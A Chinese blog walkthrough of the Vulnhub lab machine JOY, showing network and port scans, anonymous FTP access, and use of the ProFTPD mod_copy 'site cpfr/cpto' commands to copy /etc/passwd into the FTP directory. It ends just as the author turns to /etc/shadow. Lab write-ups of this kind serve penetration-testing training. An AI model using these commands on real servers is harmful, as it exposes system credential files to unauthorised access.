红队打靶练习:DIGITALWORLD.LOCAL: JOY

已于 2023-12-23 15:45:18 修改
阅读量479 收藏 8
点赞数 8
分类专栏: Vulnhub 文章标签: 网络安全
于 2023-12-23 15:43:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/135169712
版权

目录

信息收集

1、arp

2、netdiscover

3、nmap

WEB

80端口web服务

漏洞查询

漏洞测试

enum4linux

ftp匿名登陆漏洞

ftp 复制文件漏洞

补充

openssl

get root

总结

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.12.1    00:50:56:c0:00:08       VMware, Inc.
192.168.12.2    00:50:56:ec:d1:ca       VMware, Inc.
192.168.12.143  00:50:56:39:8a:fb       VMware, Inc.
192.168.12.254  00:50:56:f5:76:5b       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.361 seconds (108.43 hosts/sec). 4 responded
2、netdiscover
netdiscover -r 192.168.12.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.12.1    00:50:56:c0:00:08      1      60  VMware, Inc.
 192.168.12.2    00:50:56:ec:d1:ca      1      60  VMware, Inc.
 192.168.12.143  00:50:56:39:8a:fb      1      60  VMware, Inc.
 192.168.12.254  00:50:56:f5:76:5b      1      60  VMware, Inc.
3、nmap
主机存活探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sn 192.168.12.0/24 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 12:08 CST
Nmap scan report for 192.168.12.1
Host is up (0.00026s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.12.2
Host is up (0.000051s latency).
MAC Address: 00:50:56:EC:D1:CA (VMware)
Nmap scan report for 192.168.12.143
Host is up (0.00012s latency).
MAC Address: 00:50:56:39:8A:FB (VMware)
Nmap scan report for 192.168.12.254
Host is up (0.0026s latency).
MAC Address: 00:50:56:F5:76:5B (VMware)
Nmap scan report for 192.168.12.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 0.66 seconds


端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.12.143 --min-rate 10000 -oA ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 12:09 CST
Nmap scan report for 192.168.12.143
Host is up (0.0014s latency).
Not shown: 65523 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
465/tcp open  smtps
587/tcp open  submission
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: 00:50:56:39:8A:FB (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds

┌──(root㉿ru)-[~/kali]
└─# cat ports.nmap | head -n 17 | tail -n 12 | awk -F "/" '{print $1}' | xargs -n 12 | sed 's/ /,/g'
21,22,25,80,110,139,143,445,465,587,993,995


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sVC -O -p- 192.168.12.143 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 13:53 CST
Nmap scan report for 192.168.12.143
Host is up (0.00047s latency).
Not shown: 65523 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
|_drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: SASL AUTH-RESP-CODE UIDL PIPELINING STLS TOP CAPA RESP-CODES
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: LOGIN-REFERRALS ENABLE more OK post-login LITERAL+ listed capabilities Pre-login have SASL-IR IDLE IMAP4rev1 LOGINDISABLEDA0001 ID STARTTLS
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
587/tcp open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
993/tcp open  ssl/imap    Dovecot imapd
|_imap-capabilities: LOGIN-REFERRALS ENABLE more Pre-login LITERAL+ post-login listed capabilities have SASL-IR IDLE IMAP4rev1 OK ID AUTH=PLAINA0001
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
995/tcp open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. Ltd/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2019-01-27T17:23:23
|_Not valid after:  2032-10-05T17:23:23
|_pop3-capabilities: AUTH-RESP-CODE USER UIDL PIPELINING SASL(PLAIN) TOP CAPA RESP-CODES
MAC Address: 00:50:56:39:8A:FB (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: JOY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.12-Debian)
|   Computer name: joy
|   NetBIOS computer name: JOY\x00
|   Domain name: \x00
|   FQDN: joy
|_  System time: 2023-12-23T13:30:06+08:00
|_clock-skew: mean: -3h03m55s, deviation: 4h37m07s, median: -23m56s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2023-12-23T05:30:06
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.98 seconds


21/tcp  open  ftp         ProFTPD 1.2.10
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
80/tcp  open  http        Apache httpd 2.4.25
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 4.5.12-Debian (workgroup: WORKGROUP)
587/tcp open  smtp        Postfix smtpd
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d


靶机开启了21 ftp服务,我们尝试能不能匿名登陆!  anonymous/anonymous

WEB

80端口web服务

OSSEC  Version 0.8
漏洞查询
┌──(root㉿ru)-[~/kali]
└─# searchsploit OSSEC 0.8
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
OSSEC WUI 0.8 - Denial of Service   | php/dos/37728.py
------------------------------------ ---------------------------------
Shellcodes: No Results


是个dos漏洞,利用价值不大!

漏洞测试

enum4linux

没有共享目录,但是枚举出两个用户!
ftp匿名登陆漏洞
┌──(root㉿ru)-[~/kali]
└─# ftp 192.168.12.143
Connected to 192.168.12.143.
220 The Good Tech Inc. FTP Server
Name (192.168.12.143:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||24983|)
150 Opening ASCII mode data connection for file list
drwxr-x---   4 ftp      ftp          4096 Jan  6  2019 .
drwxr-x---   4 ftp      ftp          4096 Jan  6  2019 ..
drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
226 Transfer complete
ftp>

把东西全部下载到本地。

wget -r ftp://192.168.12.143

┌──(root㉿ru)-[~/kali]
└─# wget -r ftp://192.168.12.143
--2023-12-23 12:26:27--  ftp://192.168.12.143/
           => “192.168.12.143/.listing”
正在连接 192.168.12.143:21... 已连接。
正在以 anonymous 登录 ... 登录成功!
==> SYST ... 完成。   ==> PWD ... 完成。
==> TYPE I ... 完成。 ==> 不需要 CWD。
==> PASV ... 完成。   ==> LIST ... 完成。

192.168.12.143/.l     [ <=>        ]     245  --.-KB/s  用时 0s

2023-12-23 12:26:27 (23.5 MB/s) - “192.168.12.143/.listing” 已保存 [245]

已删除 “192.168.12.143/.listing”。
--2023-12-23 12:26:27--  ftp://192.168.12.143/download/


。。。。。。

查看信息

┌──(root㉿ru)-[~/kali/192.168.12.143/upload]
└─# cat directory
Patrick's Directory

total 296
drwxr-xr-x 18 patrick patrick 12288 Dec 23 12:20 .
drwxr-xr-x  4 root    root     4096 Jan  6  2019 ..
-rw-r--r--  1 patrick patrick     0 Dec 23 11:10 0APcUzrezRkPOwgeG6hcYalq0aNYbxGT.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:10 0Uut7GjDsY93A8uW1TX73LM0TQe5kQA9MZBMtmzJDWfXwUdGOv8Qt8igjMOKp2TQ.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:30 1mh0Vb2h2Qt2GtiSPwfnZp4SFEhGQtJQ.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:55 2A0Ycro0JfNzXFxSu4IN6UUdAaOd1oIW4RvW6qiufdWFQbBz6Z8CQmnxmAXIXSFG.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 12:00 3EL0Bxf9ABvZCoMtd5HoBIK5U7FcNThrlh3RfmQ0hMfa9CeyuZTEtd4czfGiV3FF.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 12:10 3jkQisT7ftfCJfRI9D6Z9PWaPjwYL2Kn7Yu4qtJWz6zefIupuEBfiwAEQfwz2mQU.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:05 3o2pwZJo6SgV57TjdIRbKOGWOGiGDGo8.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:45 4He8Q4C4qcrzwSxjpE3J4RDabNN8lpOExUObSNFTo0VDgXjt7itjgqb6gmkRMFnb.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:25 5Vy87GqjypFSpNHc5qQHVSMrdopnHwFUfxbe2xxno7z0TBhyvHhhCU5DnQOjhTuG.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:45 6GDqtlAbCWYi5fry41O05js2QmVNRQH2.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:15 76XiOMWUzp78mBFbruXoFaLJmNoVxbs3.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:30 9v1aE2rt8T7s6WEF1fShKcnCHNyvqgqx.txt
-rw-------  1 patrick patrick   185 Jan 28  2019 .bash_history
-rw-r--r--  1 patrick patrick   220 Dec 23  2018 .bash_logout
-rw-r--r--  1 patrick patrick  3526 Dec 23  2018 .bashrc
-rw-r--r--  1 patrick patrick    24 Dec 23 10:15 bCz8XOzaevSMbb77dxNiDFfgFDHmx9iiSuaEPzYkrX29PECJcfY4ZxyNf5bQ5k63.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:25 c1j8aagaLUVgR2OcbMOmMhHCXho1LHN4C9PZSZhM60IVBrHsfIqGAHKulsL4cbnu.txt
drwx------  7 patrick patrick  4096 Jan 10  2019 .cache
-rw-r--r--  1 patrick patrick     0 Dec 23 11:25 ce7QXnXSJkAMtAodif6dJAIs5ovfpPld.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 12:00 cohufDkIm3pDMqHmdfXBWevR8KXm7BoT.txt
drwx------ 10 patrick patrick  4096 Dec 26  2018 .config
-rw-r--r--  1 patrick patrick     0 Dec 23 10:05 CRz3fJMSy7z7iK4PGJGynR4tV8w9OFu5.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:35 cSdp1fs0NF2p1IrXBNVnpEQfEdJ5Vjo3i33aPDeGfoCOkBlewqKYrsKf8hlgFzfB.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:05 cSoTVy6kU6UOpin3A9MijX0jZHoDGs6R9SkmctC0cFtCvBP2GKAqTDdMVIOxIRGw.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:15 Cz6wRBcHu3m5vx9bXi9iP7iLnGPnnsUN.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:50 CZi5oGhDUS2zFztvN0HYZrEFB59GTEJs.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:55 DEOrWi6ngz1Q1jSH09jByyacy7SHg3Te.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Desktop
-rw-r--r--  1 patrick patrick     0 Dec 23 09:25 dJ20wzUzHbNYShDugssLHZrKspu9q7lu.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:50 Djc6Z0ARP52ZNS2oHBQM4Gwo6zipi7lZ.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 12:15 DnaF7Y6ZnulApvJYzT8CnqjZUYE9DFd0.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:45 dO7qDezUtC9hnu2dRrgpPpzYhBmKjHaT.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Documents
drwxr-xr-x  3 patrick patrick  4096 Jan  6  2019 Downloads
-rw-r--r--  1 patrick patrick     0 Dec 23 09:20 eFuYh9XT7PdqfVJGnzBSI6aAowQEFvCV.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:50 euUe6HdisyDpDeebvhp7cuUDqd4AB9WzpTJyaSg8E7mHvQgept68IAmJqYbvgKzj.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:00 f4EyHhDroF7XaP0sGEDAuVNPi2lOTBWION6u2OvFZISkE1xZ8Vf1GhQ4wNboU3wm.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:50 FBNEQJPefIPUnuMZBYqnL2QD8RucEfcONQKaN1t7krPs0J611XVSjtQWeCRhEnPq.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:40 gh7JWEqY7iT28wisr5x4OWla8X2PKV8aeTVhh8jIATAdNH58EhdTpSSjOCSU0LLQ.txt
drwx------  3 patrick patrick  4096 Dec 26  2018 .gnupg
-rw-r--r--  1 patrick patrick    24 Dec 23 08:40 gZQc2udlXinC9eGRqBUMzmI2PoNibkYWQQnXVO3RlJywvzTYGRqvPac6ZLjoQFXR.txt
-rwxrwxrwx  1 patrick patrick     0 Jan  9  2019 haha
-rw-r--r--  1 patrick patrick     0 Dec 23 09:10 Hm76sr2wwQ4ptiWe0b9v3lmLwPsD3SPH.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:25 hphC1rhKH9qP3hjxZhQhN42OfwLbgVwW.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 08:55 hqMu03wQ9AbM1tHvUoVBlj4mt4G5n3UpzmlituoWZxYyMYS749CJf5Y4pTVw6ZFA.txt
-rw-------  1 patrick patrick  8532 Jan 28  2019 .ICEauthority
-rw-r--r--  1 patrick patrick     0 Dec 23 10:20 ihuypNegCZg2I3vORklHtS1pH7fQUoN2.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 12:05 IL9qoiSShSppRNGmx09B3bwGmTWsOj8c.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:35 INKzunaXqbgmppM7mpa935Y7HZ6520j0.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:40 JlLcoI7Tz9Pl6HEmnyTvd77j6mlamuSN.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:45 juJzf2nUHIDbDaRud8pl5zxAqsEw0vJBxU7ZCbagPgZoqDY1ENxnf8P5j7SipaMs.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:50 jZNJ5qQtdC1qz2mUm3O6wtWdrgL4ztQw.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:20 kCPhQMs49E28fomi1QZr4fItT4tQ4BsmxJ3GP76VKuJ8e9BDKIe17Hchw5C9D6Bm.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:20 l1kj81leiMsiJ89jNFiZnyWJfU4rKhXMUn0Pi09SdCdcpfb7XgfcXseTuDXVBf7a.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:00 LiD08mJKtbGhiCdrxllJRZ91S7FCtKRA.txt
drwxr-xr-x  3 patrick patrick  4096 Dec 26  2018 .local
-rw-r--r--  1 patrick patrick     0 Dec 23 11:40 lWfKgR42QRUjEaWJHrJbdEPLIB1Oudpr.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:55 lY7iHV1K8oGRU56g4z2sOW8coSX35b9t.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:45 M8b5nhPZBb1zvE9qf8KkNG35rA7Qs23b.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 08:45 mBRzhbWK3FT36xspzTWEOkay52Fxnw6nBaz5kLxsP57CJVLD6iocTcpKUyfH0zHn.txt
drwx------  5 patrick patrick  4096 Dec 28  2018 .mozilla
-rw-r--r--  1 patrick patrick    24 Dec 23 11:35 mqDT1exLXz5wjT3ACJQQPcvvYLPkWpxZvhqD8LErO6UHBMqtIVzviSwaHgz4c8dh.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Music
-rw-r--r--  1 patrick patrick    24 Dec 23 12:15 MyoIzdkB2a4qI601jWfzZMmj3iPiWPUvnYv57A9NL6rOM1T73zQhlhngxTj2jPQQ.txt
drwxr-xr-x  2 patrick patrick  4096 Jan  8  2019 .nano
-rw-r--r--  1 patrick patrick    24 Dec 23 11:20 nExzMWWtZCc2HGuDyobIc4DYQ8BUQVWFgBpm4fUa0Fa2bzkmaKVNGktMLntGBIOt.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:00 NGm1C258NK1z1skr4k1Xn6zNMhgAqzKYJnv23rFFKoRCfBJTB3sjxeovXkWOOm2M.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:45 NoSfqlPOL1CrY8Q8ItcTODix5vjDlDCj.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:10 NyMoWmNgqFGEXV5k4FpyFJ0LFeUXM5UAP91enGtbVkOyG89JVxgw5xK41KBXnMnD.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:55 oHihdjDTwKUK3SmjC4ycSJYDwxluGBW6.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:10 OsBV2KBqFfn8VizzKu3XJUfk5wjJUOlddIQi9Dicfrqaa36k9MJmhqFQddTLVJzX.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Pictures
-rw-r--r--  1 patrick patrick   675 Dec 23  2018 .profile
-rw-r--r--  1 patrick patrick     0 Dec 23 12:20 PtPJ7bVY58mNQGO9EUzm5VLoWTGup0iy.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Public
-rw-r--r--  1 patrick patrick     0 Dec 23 10:35 PWXtRSNVPhQj8NsljWJLvSH7HOdonhWf.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:15 pX3rccVlbg1v1fGZEE0zzc7YxeY2ZONgnxX5nX7r1mryKN7GvaDWPstIl3O6ySyW.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:00 q3IKVZwuYqDAGnvHtR3SUoI2RuboN4lU9Eqwsed25nqlQ9IZumFLXORYpoCABOKB.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:10 qAhM9P6s04amzXUBzKpD7e6VDAdoolCw.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 10:40 qxTxQEIMdP5yGIGN0BRYPfeCsCI2ecGz.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:40 qYcMJJW9qtjQa1osridiRYVoBW2QS8oR.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 12:05 RMV49nnvahfDVe99ekI9SdYXwRKkiM1T9thlNIZtKRaxzWaZOgxfwHG8UACcAXwD.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:30 rsTq66AHW73BMf7Gbjsao4X6sz342DFtEGq3i22WfLn2E8DiMAkRfQNgrKsoFdbE.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:50 rwgVn2tIkXA988sp8PweMuTvLNxG6lC00QwsCTsu67u7OdJVeo9xwtUvKceLmvcL.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:35 s6AQY7ctMHW1Wkncds7eUAXSnIEDv8fVAk9qzyFEKjECq9BDDeatM7mpzf5CikC4.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:55 s7liOxU9gHtOHxUq5kxhDMLKiwHZbLy3CDU8wyq8aoOGRbmFtYNpWy5a6BptXrr0.txt
d---------  2 root    root     4096 Jan  9  2019 script
-rw-r--r--  1 patrick patrick     0 Dec 23 10:00 sfOUhB0wZDyu7Ci9ZK9IM6wOhpsHzIdZ.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 12:10 SiUHflaLPQumL4cwxZRRVMRAZeMwMALV.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:15 sMFOR1kBdvs14DiFYFN1CTIfUer8esy5aDgchDHUVz6HslA1Jaxbc1kMu8x3OyY2.txt
drwx------  2 patrick patrick  4096 Dec 26  2018 .ssh
-rw-r--r--  1 patrick patrick     0 Jan  6  2019 Sun
-rw-r--r--  1 patrick patrick    24 Dec 23 11:40 swVYvrQmIhAwHNBbRy07jjKg7b52w8xklfxnHWQoliv9LQoUpjTeimYwlVdur4Dr.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Templates
-rw-r--r--  1 patrick patrick     0 Dec 23 10:30 TGIcDiWeOxxquNVSlk038rua6ilHoKjM.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:05 toEWVuiWnQIkbYBRo1cJzJJ1JRJZm1YEO2hzo0viFzjlg8MOpFgDRyZynzBS1H0e.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 12:20 TqXVg2vjXeXCAnmHyqjHcr2Y8TiuZbHBbiTCzkbW8ksoysswTdA7QwgWU0kCIwym.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:00 twyI3qe1fqOsYM8HMcfvYFC1cTC1FvzE.txt
-rw-r--r--  1 patrick patrick     0 Jan  6  2019 .txt
-rw-r--r--  1 patrick patrick   407 Jan 27  2019 version_control
-rw-r--r--  1 patrick patrick    24 Dec 23 10:40 vGd50dGxKBDrHE6AdCnH3PvJX3isE8QfVkd2csJ3Rxbfd7TBv81SybZsJWaPhW1S.txt
drwxr-xr-x  2 patrick patrick  4096 Dec 26  2018 Videos
-rw-r--r--  1 patrick patrick    24 Dec 23 11:30 VitkbM0AXiAhZYJlbtpmszQbPu8knx9fZxQ0zRBxKKzoLUMp06C3GVlmM0ZJAWRh.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:55 vnPhu2Vxt290p83Jow9zEvc545yb7qnH.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:35 W2Jdam0bsm6aeg1BbGm8afllfJ7zr585.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 08:35 W53A1t82c5QmgA8ETG4toakDqRweB6B0.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 08:50 wfTZmH9p8gntYI4hFnmqM3erXI876F5rTpGKzBapvkoGCwW5ORk9BBflsAd9oS7W.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:15 Wok4a0kNFZgvnsmFToU7sU0Ot2DeJjr9.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 11:55 WWduRKKnOS8bMQs5wD5EGTfXTyuXTP918EswUhh0dxA6H0nwPkfQ3C73yYG1BM4e.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:20 XPvL5Ax8wN5mVHbDRWD0gK9GFce86b11.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 09:50 Yec4Wj8LH8yxSfCSONBZaKtHqnsbCuGr.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 08:35 YgG4CnvsSsgBDE5eH8XAlNEdM1lqALxk8SmMfRc0TVpZdK4wfQXzUFieebvA092g.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 09:05 YqDGUefoci5XPPLpp1PujhJhQm5HlaxLrKixWwBVF0F80yEhcNLToGYc6W3Wzcb1.txt
-rw-r--r--  1 patrick patrick     0 Dec 23 11:05 yxTRmFQv4340u69AvFWhv9TBrIRhBglb.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:30 Z1HFJ8x52grnH5EoefAaOI2GtSxTRypSAUL3SVe7Dma7WFBMVGAGfCJHer6X5ZfB.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:45 ZF0qyYqqcMVvRzyhxB7GViMrT3IQbKUAKZIVRpKplsSsKFwiStFo1XJZurxwhDbV.txt
-rw-r--r--  1 patrick patrick    24 Dec 23 10:25 zWGDtSIjrbIWxpAhoLVeuUKcWutMBhBjVfvb6cqMTUMpe2s4wHPq65F2uzV7tMyL.txt

You should know where the directory can be accessed.

Information of this Machine!

Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux


去除一些随机生成的,有version_control文件可以尝试查看一下

文件的末尾:
You should know where the directory can be accessed.

Information of this Machine!

您应该知道可以访问目录的位置。
这台机器的信息!


根据靶机提示,我们要复制什么东西到某个地方!ftp也有文件复制漏洞!利用ftp文件复制漏洞,可以远程把机器的文件复制到指定目录下。
ftp 复制文件漏洞
┌──(root㉿ru)-[~/kali]
└─# telnet 192.168.12.143 21
Trying 192.168.12.143...
Connected to 192.168.12.143.
Escape character is '^]'.
220 The Good Tech Inc. FTP Server
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /home/ftp/pass
250 Copy successful

提示复制成功!

解释:

site cpfr"命令指定原始文件路径为"/etc/passwd",然后使用"site cpto"命令指定目标文件路径为"/home/ftp/pass",最终我们得到了"Copy successful"的确认消息。


┌──(root㉿ru)-[~/kali]
└─# ftp 192.168.12.143
Connected to 192.168.12.143.
220 The Good Tech Inc. FTP Server
Name (192.168.12.143:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||13040|)
150 Opening ASCII mode data connection for file list
drwxr-x---   4 ftp      ftp          4096 Dec 23 05:37 .
drwxr-x---   4 ftp      ftp          4096 Dec 23 05:37 ..
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 04:56 download
-rw-r--r--   1 0        0            2556 Dec 23 05:37 pass
drwxrwxr-x   2 ftp      ftp          4096 Dec 23 05:02 upload
226 Transfer complete

果然复制过来了!

┌──(root㉿ru)-[~/kali]
└─# cat pass | grep "/home" | grep -v "nologin"
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
ntp:x:121:126::/home/ntp:/bin/false
ftp:x:1001:1001::/home/ftp:/bin/false


尝试把 /etc/shadow 文件复制过来!

┌──(root㉿ru)-[~/kali]
